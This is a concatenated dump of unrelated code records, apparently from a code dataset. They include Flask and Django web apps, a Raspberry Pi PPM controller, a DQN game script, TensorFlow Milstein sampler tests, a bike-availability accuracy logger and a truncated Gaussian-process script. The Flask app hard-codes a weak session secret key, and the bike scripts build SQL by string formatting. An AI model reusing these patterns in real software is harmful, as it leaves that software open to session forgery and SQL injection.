  2. \"\n # _str += \"
\"\n # return HttpResponse(_str)\n items = models.Item.objects.all()\n context = {\"items\": items}\n return render(request,\"items_list.html\",context)\n\n\n","sub_path":"MainApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"264661793","text":"# This is a sample Python script.\r\n\r\n# Press Shift+F10 to execute it or replace it with your code.\r\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\r\n\r\n\r\ndef print_hi(name):\r\n # Use a breakpoint in the code line below to debug your script.\r\n print(f'Hi, {name}') # Press Ctrl+F8 to toggle the breakpoint.\r\n n=[1,1,1,0,0,0,1,1,1,1,1,1,0,0,1,1,1,1,1,0,1]\r\n # n=[0,0,0,0,0,0,0,0]\r\n # n=[1,1,1,1,1]\r\n pstr_one=[]\r\n one =0\r\n # for i in range(len(n)):\r\n # if n[i] == 1:\r\n # one = one +1\r\n # if i == len(n)-1:\r\n # pstr_one.append(one)\r\n # if n[i] == 0:\r\n # if n[i-1] !=0:\r\n # pstr_one.append(one)\r\n # one = 0\r\n # pstr_one.sort(reverse=True)\r\n # if len(pstr_one)!=0:\r\n # k = pstr_one[0]\r\n # else:\r\n # k=0\r\n # print(pstr_one)\r\n # print(k)\r\n result =0\r\n for i in range(len(n)):\r\n if n[i]==0:\r\n one =0\r\n else:\r\n one+=1\r\n result= max(result,one)\r\n\r\n print(result)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# Press the green button in the gutter to run the script.\r\nif __name__ == '__main__':\r\n print_hi('PyCharm')\r\n\r\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"pythonProject/count one.py","file_name":"count one.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"326957780","text":"from flask import Flask, request, session, redirect, render_template\nfrom forms import CreateAccountForm, LoginForm, CommentForm\nfrom data import get_user, all_users\n\napp = Flask(__name__)\napp.secret_key = 'THIS!IS!A!TERRIBLE!SECRET!KEY'\n\n\n@app.route('/')\ndef home():\n if 'user_id' in session:\n return redirect('/wall')\n else:\n return render_template('home.html')\n\n\n@app.route('/users')\ndef users():\n return render_template('users.html', users=all_users())\n\n\n@app.route('/account/create', methods=['GET', 'POST'])\ndef create_account():\n if request.method == 'GET':\n return render_template('account_create.html', form=CreateAccountForm())\n else:\n form = CreateAccountForm.from_request(request)\n if form.is_valid():\n account = form.create_account()\n session['user_id'] = account['id']\n return redirect(form.success_url)\n else:\n return render_template('account_create.html', form=form)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if 'user_id' in session:\n return redirect('/wall')\n elif request.method == 'GET':\n return render_template('login.html', form=LoginForm())\n else:\n form = LoginForm.from_request(request)\n if form.is_valid():\n session['user_id'] = form.user_id\n return redirect('/wall')\n else:\n return render_template('login.html', form=form)\n\n\n@app.route('/logout')\ndef logout():\n session.pop('user_id', None)\n return redirect('/')\n\n\n@app.route('/wall')\ndef wall():\n if 'user_id' in session:\n return render_template('wall.html', user=get_user(session['user_id']))\n else:\n return redirect('/login')\n\n\n@app.route('/wall/')\ndef other_wall(user_id):\n if 'user_id' in session and session['user_id'] == user_id:\n return redirect('/wall')\n user = get_user(user_id)\n if user:\n return render_template('other_wall.html', user=user)\n else:\n return render_template('user_not_found.html'), 404\n\n\n@app.route('/wall//comment', methods=['GET', 'POST'])\ndef post_comment(user_id):\n if 'user_id' in session:\n current_user = get_user(session['user_id'])\n user = get_user(user_id)\n if user:\n if request.method == 'GET':\n form = CommentForm(wall_owner=user, author=current_user)\n return render_template('wall_comment.html', form=form)\n else:\n form = CommentForm.from_request(\n request, wall_owner=user, author=current_user)\n if form.is_valid():\n form.post_comment()\n return redirect('/wall/{}'.format(user_id))\n else:\n return render_template('wall_comment.html', form=form)\n else:\n return render_template('user_not_found.html'), 404\n else:\n return redirect('/login')\n","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"63310349","text":"from ..models import Episode, UserWatchEpisode\nfrom ..infrastructures import ApiCustomException\nfrom ..constant import ErrorDefine\n\n\nclass EpisodeAdapter:\n def __init__(self):\n pass\n\n def save_current_watch_time(self, user, current_time, episode_id):\n try:\n episode = Episode.objects.get(id=episode_id)\n user_watch_episode = UserWatchEpisode.objects.filter(user_id=user, episode_id_id=episode_id)\n\n if user_watch_episode.exists():\n user_watch_episode = user_watch_episode.first()\n user_watch_episode.current_time = current_time\n user_watch_episode.save()\n\n return user_watch_episode\n\n user_watch_episode = UserWatchEpisode(user_id=user, episode_id=episode, current_time=current_time)\n user_watch_episode.save()\n\n return user_watch_episode\n except Episode.DoesNotExist:\n raise ApiCustomException(ErrorDefine.EPISODE_NOT_EXIST)\n\n def get_user_watch_episode_by_user_and_epsiode_id(self, episode, user=None):\n if user is None:\n return None\n\n user_watch_episode = UserWatchEpisode.objects.filter(user_id=user, episode_id=episode)\n\n if user_watch_episode.exists():\n return user_watch_episode.first()\n\n return None\n\n def get_by_id(self, episode_id, user=None):\n try:\n episode = Episode.objects.get(id=episode_id)\n\n episode.user_watch_episode = self.get_user_watch_episode_by_user_and_epsiode_id(episode, user)\n\n return episode\n except Episode.DoesNotExist:\n raise ApiCustomException(ErrorDefine.EPISODE_NOT_EXIST)\n\n def get_by_episode_number(self, episode_number, slug, user=None):\n try:\n episode = Episode.objects.filter(number=episode_number, film_id__slug=slug)\n print(episode_number)\n if not episode.exists():\n raise ApiCustomException(ErrorDefine.EPISODE_NOT_FOUND)\n\n episode = episode.first()\n episode.user_watch_episode = self.get_user_watch_episode_by_user_and_epsiode_id(episode, user)\n\n return episode\n except Episode.DoesNotExist:\n raise ApiCustomException(ErrorDefine.EPISODE_NOT_EXIST)\n\n def get_base_by_id(self, episode_id):\n try:\n episode = Episode.objects.get(id=episode_id)\n\n return episode\n except Episode.DoesNotExist:\n raise ApiCustomException(ErrorDefine.EPISODE_NOT_EXIST)","sub_path":"Fifistudy/fifistudy_api/adapter/episode_adapter.py","file_name":"episode_adapter.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"608754746","text":"from threading import Thread\nimport time\nimport ins\ntry:\n import pigpio\nexcept ImportError:\n print('Warning: pigio is NOT imported')\n import mpigpio as pigpio\n\n# @ins.only\n# class Controller(Thread):\n# \"\"\"PPM output controller powered by pigpio\n\n# **Start the pigpio daemon before running: sudo pigpiod**\n\n# Arguments:\n# input_queue -- Queue to trans\n# gpio -- Number of output pin, equivalent to GPIO.BCM (GPIOX)\n# channel -- Number of PPM channel (8 default)\n# frame_ms -- Time interval between frames in microsecond (5 minimum, 20 default)\n\n# Source: https://www.raspberrypi.org/forums/viewtopic.php?t=219531\n# \"\"\"\n\n# def __init__(self, input_queue, gpio, channels=8, frame_ms=20, gpio_sonic=19):\n# Thread.__init__(self)\n# self._input_queue = input_queue\n# self._gpio = gpio\n# self._channels = channels\n# self._pi = ins.get_only(pigpio.pi)\n\n# if not self._pi.connected:\n# print('Error: pigpio is not initialized')\n# exit(0)\n\n# self._ppm = PPM(self._pi, self._gpio, channels=channels, frame_ms=frame_ms, gpio_sonic=gpio_sonic)\n# # Default output signal for stablizing\n# self._ppm.update_channels([1500, 1500, 1100, 1500, 1500, 1500, 1500, 1500])\n# self.daemon = 1\n# self.start()\n\n# def run(self):\n# while 1:\n# signals = self._input_queue.get()\n# self._ppm.update_assign(signals)\n@ins.only\nclass PPM(Thread):\n \"\"\"8 channel PPM output powered by pigpio\n\n **Start the pigpio daemon before running: sudo pigpiod**\n\n Arguments:\n pi -- pigpio.pi()\n gpio -- Number of output pin, equivalent to GPIO.BCM (GPIOX)\n channel -- Number of PPM channel (8 default)\n frame_ms -- Time interval between frames in microsecond (5 minimum, 20 default)\n\n Source: https://www.raspberrypi.org/forums/viewtopic.php?t=219531\n \"\"\"\n GAP = 400\n WAVES = 3\n\n def __init__(self, input_queue, gpio, channels=8, frame_ms=20, gpio_sonic=19):\n Thread.__init__(self)\n self.adjust = 1\n self._input_queue = input_queue\n self.pi = ins.get_only(pigpio.pi)\n self.gpio = gpio\n self.gpio_sonic = gpio_sonic\n\n if frame_ms < 5:\n frame_ms = 5\n channels = 2\n elif frame_ms > 100:\n frame_ms = 100\n\n self.frame_ms = frame_ms\n\n self._frame_us = int(frame_ms * 1000)\n self._frame_secs = frame_ms / 1000.0\n\n if channels < 1:\n channels = 1\n elif channels > (frame_ms // 2):\n channels = int(frame_ms // 2)\n\n self.channels = channels\n\n # set each channel to minimum pulse width\n self._widths = [1000] * channels\n\n self._wid = [None]*self.WAVES\n self._next_wid = 0\n\n self.pi.write(gpio, pigpio.LOW)\n self.pi.write(gpio_sonic, pigpio.LOW)\n\n self._update_time = time.time()\n\n self.update_channels([1500, 1500, 1100, 1500, 1500, 1500, 1500, 1500])\n self.daemon = 1\n self.start()\n\n def run(self):\n while 1:\n signals = self._input_queue.get()\n self.update_assign(signals)\n\n def _update(self):\n # 建立waveform\n wf = []\n micros = 0\n for i in self._widths:\n wf.append(pigpio.pulse(0, 1 << self.gpio, self.GAP))\n wf.append(pigpio.pulse(1 << self.gpio, 0, i))\n micros += (i+self.GAP)\n wf.append(pigpio.pulse(0, 1 << self.gpio, self.GAP-15))\n # 超音波trig也順便發出\n wf.append(pigpio.pulse(1 << self.gpio_sonic, 0, 15))\n micros += self.GAP\n wf.append(pigpio.pulse(1 << self.gpio, 1 << self.gpio_sonic, self._frame_us-micros))\n\n # 建立wf並傳送出去(嘗試同步)\n self.pi.wave_add_generic(wf)\n wid = self.pi.wave_create()\n self.pi.wave_send_using_mode(wid, pigpio.WAVE_MODE_REPEAT_SYNC)\n self._wid[self._next_wid] = wid\n\n self._next_wid += 1\n if self._next_wid >= self.WAVES:\n self._next_wid = 0\n\n # 等發送完一次之後才能繼續\n remaining = self._update_time + self._frame_secs - time.time()\n if remaining > 0:\n time.sleep(remaining)\n self._update_time = time.time()\n\n wid = self._wid[self._next_wid]\n if wid is not None:\n self.pi.wave_delete(wid)\n self._wid[self._next_wid] = None\n\n def update_assign(self, signals):\n for signal in signals:\n self._widths[signal[0]] = min(max(signal[1], -400), 400)-self.GAP+1500\n self._update()\n\n def update_channel(self, channel, width):\n # self._widths[channel] = width\n self._widths[channel] = width - self.GAP # workaround for singal offset problem\n self._update()\n\n def update_channels(self, widths):\n # self._widths[0:len(widths)] = widths[0:self.channels]\n self._widths[0:len(widths)] = [w - self.GAP for w in widths[0:self.channels]] # workaround for singal offset problem\n self._update()\n\n def cancel(self):\n self.pi.wave_tx_stop()\n for i in self._wid:\n if i is not None:\n self.pi.wave_delete(i)\n\n\nif __name__ == \"__main__\":\n # pi = pigpio.pi()\n # pi.write(6, 1)\n # input('>>>')\n\n # if not pi.connected:\n # exit(0)\n\n # pi.wave_tx_stop() # Start with a clean slate.\n\n # ppm = PPM(pi, 6, frame_ms=20)\n\n # # updates = 0\n # # start = time.time()\n # # for chan in range(8):\n # # for pw in range(1000, 2000, 5):\n # # ppm.update_channel(chan, pw)\n # # updates += 1\n # # end = time.time()\n # # secs = end - start\n # # print(\"{} updates in {:.1f} seconds ({}/s)\".format(updates, secs, int(updates/secs)))\n # # time.sleep(2)\n # input()\n\n # ppm.cancel()\n\n # pi.stop()\n pass\n","sub_path":"ver2/ppm.py","file_name":"ppm.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"579329535","text":"from IntCode import runProgram\nfrom copy import deepcopy\n\nf = open('Day19Input.txt')\nfor line in f:\n program = line.strip('\\n').split(',')\n program = [int(n) for n in program]\nf.close()\n\ninitProgram = deepcopy(program)\noutputArea = ''\npointsAffected = 0\nfor x in range(0,50):\n for y in range(0,50):\n inputParameters = [x,y]\n ip = 0\n relativeBase = 0\n halt = False\n while not(halt):\n [program,ip,relativeBase,outputs,halt,waiting] = runProgram(initProgram,ip,relativeBase,inputParameters,'Parameter',False)\n if outputs[0] == 1:\n outputArea += '#'\n pointsAffected += 1\n else:\n outputArea += '.'\n outputArea += '\\n'\n\nprint(pointsAffected)\n\n ","sub_path":"Day19Part1.py","file_name":"Day19Part1.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"375855343","text":"import random, time\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nimport torch\r\n\r\nfrom utils_plot import plot_state\r\n\r\nUSE_CUDA = False\r\ndtype = torch.cuda.FloatTensor if USE_CUDA else torch.FloatTensor\r\n\r\n\r\ndef play_game(env, Q):\r\n\r\n # Play game\r\n plt.ion()\r\n plt.figure(figsize=(20, 10))\r\n flag = 1\r\n stats = np.zeros([2, 7])\r\n stats_symm = np.zeros([2, 7])\r\n action=None\r\n while flag:\r\n obs, _ = env.reset(random.randint(0, 1))\r\n done = False\r\n win = False\r\n lose = False\r\n draw = False\r\n while not done:\r\n plt.subplot(2, 1, env.player + 1)\r\n input_to_dqn = torch.from_numpy(obs.transpose(2, 0, 1)).type(dtype).unsqueeze(0)\r\n stats[0, :] = Q(input_to_dqn).data.cpu().numpy()\r\n opponent_obs = env.swap_state(player=1)[:, :, :2]\r\n opponent_input_to_dqn = torch.from_numpy(opponent_obs.transpose(2, 0, 1)).type(dtype).unsqueeze(0)\r\n stats[1, :] = Q(opponent_input_to_dqn).data.cpu().numpy()\r\n\r\n input_to_dqn = np.flip(obs.transpose(2, 0, 1), axis=2).copy()\r\n input_to_dqn = torch.from_numpy(input_to_dqn).type(dtype).unsqueeze(0)\r\n stats_symm[0, :] = np.flip(Q(input_to_dqn).data.cpu().numpy(), axis=1)\r\n opponent_obs = env.swap_state(player=1)[:, :, :2]\r\n opponent_input_to_dqn = np.flip(opponent_obs.transpose(2, 0, 1), axis=2).copy()\r\n opponent_input_to_dqn = torch.from_numpy(opponent_input_to_dqn).type(dtype).unsqueeze(0)\r\n stats_symm[1, :] = np.flip(Q(opponent_input_to_dqn).data.cpu().numpy(), axis=1)\r\n plot_state(env.state, 'Game Turn {}'.format(env.turn), action=action, stats=stats, stats_symm=stats_symm)\r\n plt.show()\r\n plt.pause(0.01)\r\n\r\n if env.player == 0:\r\n # Get player action\r\n action = int(input(\"What is your move? (Choose from 0 to {})\".format(env.BOARD_W - 1)))\r\n obs, reward, done, _ = env.step(action)\r\n if done:\r\n if reward > 0:\r\n win = True\r\n elif reward < 0:\r\n lose = True\r\n else:\r\n draw = True\r\n else:\r\n # Get opponent action\r\n opponent_obs = env.swap_state(player=1)[:, :, :2]\r\n opponent_input_to_dqn = torch.from_numpy(opponent_obs.transpose(2, 0, 1)).type(dtype).unsqueeze(0)\r\n\r\n tic = time.perf_counter()\r\n with torch.no_grad():\r\n action = Q(opponent_input_to_dqn).data.max(dim=1)[1].cpu().numpy()\r\n print('time: {}'.format(time.perf_counter() - tic))\r\n\r\n obs, reward, done, _ = env.step(action)\r\n if done:\r\n if reward > 0:\r\n lose = True\r\n elif reward < 0:\r\n win = True\r\n else:\r\n draw = True\r\n\r\n plt.subplot(2, 1, 1)\r\n plot_state(env.state, 'Game Turn {}'.format(env.turn), action=action)\r\n plt.show()\r\n plt.pause(0.01)\r\n print(action)\r\n print(reward)\r\n if win:\r\n print('YOU WIN')\r\n if lose:\r\n print('YOU LOSE!')\r\n if draw:\r\n print('DRAW!')\r\n flag = int(input(\"Play again? (Choose from 0,1)\"))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from model import DQN_CNN_WIDE_PREDICTION\r\n from utils_save import load_model\r\n from utils_game import Game\r\n\r\n env = Game()\r\n\r\n Q = DQN_CNN_WIDE_PREDICTION()\r\n model_path = './best_model/'\r\n model = 'best_model'\r\n checkpoint_path = model_path + model + '.pth.tar'\r\n params = load_model(Q, checkpoint_path)\r\n print(params)\r\n\r\n def policy(obs):\r\n return Q(obs)\r\n\r\n play_game(env, policy)\r\n","sub_path":"RL/FourInRow/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":3922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"192606211","text":"#!/usr/bin/env python\nimport rospy\nimport numpy as np\nimport array\nimport cv2\n\nfrom remote_engine import *\nfrom mi_msgs.msg import Remote\nfrom sensor_msgs.msg import Image\n\n\nfrom cv_bridge import CvBridge, CvBridgeError\n\nclass Remote_controller(object):\n def __init__(self):\n self.remote_pub = rospy.Publisher('remote_messages', Remote, queue_size = 10)\n self.remote_img_pub = rospy.Publisher('remote_img_messages',Image,queue_size = 10)\n self.bridge = CvBridge()\n self.width = 500\n self.height = 500\n self.remote_engine = Remote_engine()\n self.image = self.remote_engine.backbone()\n self.mouse_down = False ###to drag###\n self.cmd = Remote()\n self.image_num = 2 ###remote_controller img, odometory grid map img\n self.total_image = np.zeros((self.height,self.width*self.image_num),dtype=np.uint8)\n\n def img_publish(self):\n #self.image = self.remote_engine.backbone()\n self.cmd, self.image = self.remote_engine.data_transmission()\n img_msgs = self.bridge.cv2_to_imgmsg(self.image,'mono8')\n self.remote_img_pub.publish(img_msgs)\n \n def cmd_publish(self):\n self.remote_pub.publish(self.cmd)\n\n def drag(self,event,x,y,flags,param):\n \n if event == cv2.EVENT_LBUTTONDBLCLK:\n self.remote_engine.insert(x,y)\n self.img_publish()\n self.cmd_publish()\n \n ###drag mode###\n \n '''\n if event == cv2.EVENT_LBUTTONDOWN:\n self.mouse_down = True\n\n elif event == cv2.EVENT_MOUSEMOVE:\n \n if self.mouse_down:\n if(x < 500 and x >= 0): ###bar limit for safe\n self.remote_engine.insert(x,y)\n self.img_publish()\n self.cmd_publish()\n #print('mouse_moving',x,y)\n\n elif event == cv2.EVENT_LBUTTONUP:\n self.mouse_down = False\n '''\n\n def merge(self,images):\n for index,image in enumerate(images):\n self.total_image[self.height*0:self.height*1,self.width*index:self.width*(index+1)] = image\n return self.total_image\n \n def display(self):\n cv2.namedWindow('remote_controller',cv2.WINDOW_NORMAL)\n cv2.resizeWindow('remote_controller', 500,500)\n cv2.setMouseCallback('remote_controller', self.drag)\n cv2.imshow('remote_controller',self.image)\n cv2.waitKey(1)\n\nif __name__ == '__main__':\n rospy.init_node('remote_controller',anonymous=True)\n remoter = Remote_controller()\n rate = rospy.Rate(50)\n while not rospy.is_shutdown():\n remoter.display()\n rate.sleep()\n\n","sub_path":"src/ui/src/remote_controller.py","file_name":"remote_controller.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"564795995","text":"# Lint as: python3\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Tests for methods in `milstein_sampling`.\"\"\"\n\nfrom absl.testing import parameterized\n\nimport numpy as np\nimport tensorflow.compat.v2 as tf\n\nimport tf_quant_finance as tff\n\nfrom tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import\n\nmilstein_sampling = tff.models.milstein_sampling\neuler_sampling = tff.models.euler_sampling\nrandom = tff.math.random\n\n\n@test_util.run_all_in_graph_and_eager_modes\nclass MilsteinSamplingTest(tf.test.TestCase, parameterized.TestCase):\n\n @parameterized.named_parameters(\n {\n 'testcase_name': 'CustomForLoopWithTimeStep',\n 'watch_params': True,\n 'use_time_step': True,\n }, {\n 'testcase_name': 'WhileLoopWithTimeStep',\n 'watch_params': False,\n 'use_time_step': True,\n },\n {\n 'testcase_name': 'CustomForLoopWithNumSteps',\n 'watch_params': True,\n 'use_time_step': False,\n }, {\n 'testcase_name': 'WhileLoopWithNumSteps',\n 'watch_params': False,\n 'use_time_step': False,\n })\n def test_sample_paths_wiener(self, watch_params, use_time_step):\n \"\"\"Tests paths properties for Wiener process (dX = dW).\"\"\"\n\n def drift_fn(_, x):\n return tf.zeros_like(x)\n\n def vol_fn(_, x):\n return tf.expand_dims(tf.ones_like(x), -1)\n\n times = np.array([0.1, 0.2, 0.3])\n num_samples = 10000\n if watch_params:\n watch_params = []\n else:\n watch_params = None\n if use_time_step:\n time_step = 0.01\n num_time_steps = None\n else:\n time_step = None\n num_time_steps = 30\n paths = milstein_sampling.sample(\n dim=1,\n drift_fn=drift_fn,\n volatility_fn=vol_fn,\n times=times,\n num_samples=num_samples,\n seed=42,\n time_step=time_step,\n num_time_steps=num_time_steps,\n watch_params=watch_params)\n self.assertAllEqual(paths.shape.as_list(), [num_samples, 3, 1])\n paths = self.evaluate(paths)\n means = np.mean(paths, axis=0).reshape([-1])\n covars = np.cov(paths.reshape([num_samples, -1]), rowvar=False)\n expected_means = np.zeros((3,))\n expected_covars = np.minimum(times.reshape([-1, 1]), times.reshape([1, -1]))\n self.assertAllClose(means, expected_means, rtol=1e-2, atol=1e-2)\n self.assertAllClose(covars, expected_covars, rtol=1e-2, atol=1e-2)\n\n def test_sample_paths_1d(self):\n \"\"\"Tests path properties for 1-dimentional Ito process.\n\n We construct the following Ito process.\n\n ````\n dX = mu * sqrt(t) * dt + (a * t + b) dW\n ````\n\n For this process expected value at time t is x_0 + 2/3 * mu * t^1.5 .\n \"\"\"\n mu = 0.2\n a = 0.4\n b = 0.33\n\n def drift_fn(t, x):\n return mu * tf.sqrt(t) * tf.ones_like(x, dtype=t.dtype)\n\n def vol_fn(t, x):\n del x\n return (a * t + b) * tf.ones([1, 1], dtype=t.dtype)\n\n times = np.array([0.0, 0.1, 0.21, 0.32, 0.43, 0.55])\n num_samples = 10000\n x0 = np.array([0.1])\n paths = self.evaluate(\n milstein_sampling.sample(\n dim=1,\n drift_fn=drift_fn,\n volatility_fn=vol_fn,\n times=times,\n num_samples=num_samples,\n initial_state=x0,\n random_type=tff.math.random.RandomType.STATELESS_ANTITHETIC,\n time_step=0.01,\n seed=[1, 42]))\n paths_no_zero = self.evaluate(\n milstein_sampling.sample(\n dim=1,\n drift_fn=drift_fn,\n volatility_fn=vol_fn,\n times=times[1:],\n num_samples=num_samples,\n initial_state=x0,\n random_type=tff.math.random.RandomType.STATELESS_ANTITHETIC,\n time_step=0.01,\n seed=[1, 42]))\n\n with self.subTest('CorrectShape'):\n self.assertAllClose(paths.shape, (num_samples, 6, 1), atol=0)\n means = np.mean(paths, axis=0).reshape(-1)\n expected_means = x0 + (2.0 / 3.0) * mu * np.power(times, 1.5)\n with self.subTest('ExpectedResult'):\n self.assertAllClose(means, expected_means, rtol=1e-2, atol=1e-2)\n with self.subTest('IncludeInitialState'):\n self.assertAllClose(paths[:, 1:, :], paths_no_zero)\n\n def test_sample_bsm(self):\n r\"\"\"Tests path properties for 1-dimensional Black Scholes Merton.\n\n We construct the following Ito process.\n\n ````\n dX = r * X * dt + \\sigma * X * dW\n ````\n\n Note, that we're not testing in log space.\n \"\"\"\n r = 0.5\n sigma = 0.5\n\n def drift_fn(t, x):\n del t\n return r * x\n\n def vol_fn(t, x):\n del t\n return sigma * tf.expand_dims(x, -1)\n\n times = np.array([0.0, 0.1, 0.21, 0.32, 0.43, 0.55])\n num_samples = 10000\n x0 = np.array([0.1])\n paths = self.evaluate(\n milstein_sampling.sample(\n dim=1,\n drift_fn=drift_fn,\n volatility_fn=vol_fn,\n times=times,\n num_samples=num_samples,\n initial_state=x0,\n random_type=tff.math.random.RandomType.STATELESS_ANTITHETIC,\n time_step=0.01,\n seed=[1, 42]))\n\n euler_paths = self.evaluate(\n euler_sampling.sample(\n dim=1,\n drift_fn=drift_fn,\n volatility_fn=vol_fn,\n times=times,\n num_samples=num_samples,\n initial_state=x0,\n random_type=tff.math.random.RandomType.STATELESS_ANTITHETIC,\n time_step=0.01,\n seed=[1, 42]))\n\n mean = np.average(paths)\n stddev = np.std(paths)\n euler_mean = np.average(euler_paths)\n euler_stddev = np.std(euler_paths)\n self.assertAllClose((mean, stddev), (euler_mean, euler_stddev),\n rtol=1e-3,\n atol=1e-3)\n\n def test_sample_paths_dtypes(self):\n \"\"\"Tests that sampled paths have the expected dtypes.\"\"\"\n r = 0.5\n sigma = 0.5\n\n def drift_fn(t, x):\n del t\n return r * x\n\n def vol_fn(t, x):\n del t\n return sigma * tf.expand_dims(x, -1)\n\n for dtype in [np.float32, np.float64]:\n paths = self.evaluate(\n milstein_sampling.sample(\n dim=1,\n drift_fn=drift_fn, volatility_fn=vol_fn,\n times=[0.1, 0.2],\n num_samples=10,\n initial_state=[0.1],\n time_step=0.01,\n seed=123,\n dtype=dtype))\n\n self.assertEqual(paths.dtype, dtype)\n\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"tf_quant_finance/models/milstein_sampling_test.py","file_name":"milstein_sampling_test.py","file_ext":"py","file_size_in_byte":7005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"458558270","text":"\n# coding: utf-8\n\n# In[7]:\n\n\n# THIS SCRIPT: compare the prediction of available bikes and stands when the weather is clear and when\n# the weather is the actual weather condition (from OWMap API) and return the percentages\n# of difference between the 2.\n\nimport mysql.connector\nfrom mysql.connector import Error\nimport requests\n\n\n# In[8]:\n\n\nfrom datetime import datetime, date\nimport time\nimport calendar\n\n\n# In[9]:\n\n\ndef makeConnection():\n mySQLconnection = mysql.connector.connect(host='***',\n database='Dublin_bikes_db',\n user='***',\n password='***', port='3306')\n return mySQLconnection\n\n\n# In[10]:\n\n\ndef compute_info_box(number):\n try:\n mySQLconnection = makeConnection()\n\n sql = \"\"\" SELECT sd.`number`, sd.banking, sd.`name`, dd.`status`, dd.available_bike_stands, dd.available_bikes\n FROM static_data sd, dynamic_data dd WHERE sd.`number` = %s and dd.`number` = %s ORDER BY dd.last_update DESC LIMIT 1;\"\"\" % (number, number)\n cursor = mySQLconnection.cursor()\n try:\n cursor.execute(sql)\n records = cursor.fetchall()\n print(\"data extracted from db is: \", records)\n\n rec_dict = {\n 'number' : records[0][0],\n 'banking' : records[0][1],\n 'name' : records[0][2],\n 'status' : records[0][3],\n 'available_bike_stands' : records[0][4],\n 'available_bikes' : records[0][5]\n }\n\n if(mySQLconnection.is_connected()):\n mySQLconnection.close()\n\n return rec_dict\n\n except Error as e1:\n print(e1)\n\n except Error as e:\n print(e)\n\n finally:\n if(mySQLconnection.is_connected()):\n mySQLconnection.close()\n print(\"MySQL connection is closed\")\n\n\n# In[11]:\n\n\ndef compute_hourly_prediction(number, dateString):\n weekDay = dateString[:3]\n try:\n mySQLconnection = makeConnection()\n\n sql = \"\"\"select avg(available_bikes) as 'pred_bikes', avg(available_bike_stands) as 'pred_stands',\n DATE_FORMAT(FROM_UNIXTIME(`last_update`/1000), '%%H') AS 'date_formatted'\n from Dublin_bikes_db.dynamic_data\n where `number` = %s and DATE_FORMAT(FROM_UNIXTIME(`last_update`/1000), '%%a') = '%s'\n group by `date_formatted`;\"\"\" % (number, weekDay)\n cursor = mySQLconnection.cursor()\n try:\n cursor.execute(sql)\n records = cursor.fetchall()\n\n h_pred = {}\n for rec in records:\n h_pred[rec[2]] = {\n 'bikes' : rec[0],\n 'stands' : rec[1]\n }\n\n if(mySQLconnection.is_connected()):\n mySQLconnection.close()\n\n return h_pred\n\n except Error as e1:\n print(e1)\n\n except Error as e:\n print(e)\n\n finally:\n if(mySQLconnection.is_connected()):\n mySQLconnection.close()\n print(\"MySQL connection is closed\")\n\n\n# In[12]:\n\n\ndef get_accuracy(accuracy):\n return '' + accuracy + '%'\n\n\n# In[14]:\n\n\nwhile True:\n my_date = date.today()\n day = calendar.day_name[my_date.weekday()]\n weekDay = day[:3]\n changeSum = 0\n count = 0\n for num in range(2,116):\n now = datetime.now()\n hour = str(now.hour)\n try:\n predDict = compute_hourly_prediction(num, weekDay)\n realDict = compute_info_box(num)\n\n predBike = predDict[hour]['bikes']\n predStands = predDict[hour]['stands']\n\n realStands = realDict['available_bike_stands']\n realBikes = realDict['available_bikes']\n\n changeBikes = abs(((predBike - realBikes) / abs(realBikes)) * 100)\n changeStands = abs(((predStands - realStands) / abs(realStands)) * 100)\n changeMean = (changeBikes + changeStands) / 2\n changeSum += changeMean\n count += 1\n except:\n pass\n accuracy = round(100 - (changeSum / count))\n print(get_accuracy(str(accuracy)))\n with open('accuracy.csv','a') as fd:\n fd.write(str(accuracy) + ',')\n time.sleep(1*60*60)\n","sub_path":"accuracy_log/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"259461040","text":"\"\"\"\nProduces\n\ngp-training-data.pdf\ngp-example-prior-draws.pdf\n\"\"\"\n\nimport thesis\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cmap\ncm = cmap.inferno\n\nplt.style.use(\"../thesis-style.mpl\")\n\n\nimport numpy as np\nimport scipy as sp\nimport theano\nimport theano.tensor as tt\nimport theano.tensor.nlinalg\nimport sys\n#sys.path.insert(0, \"../../..\")\nimport pymc3 as pm\n\nx = np.linspace(0, 10, 20) \nx_unc = x + 0.5 * np.random.randn(len(x))\ny = 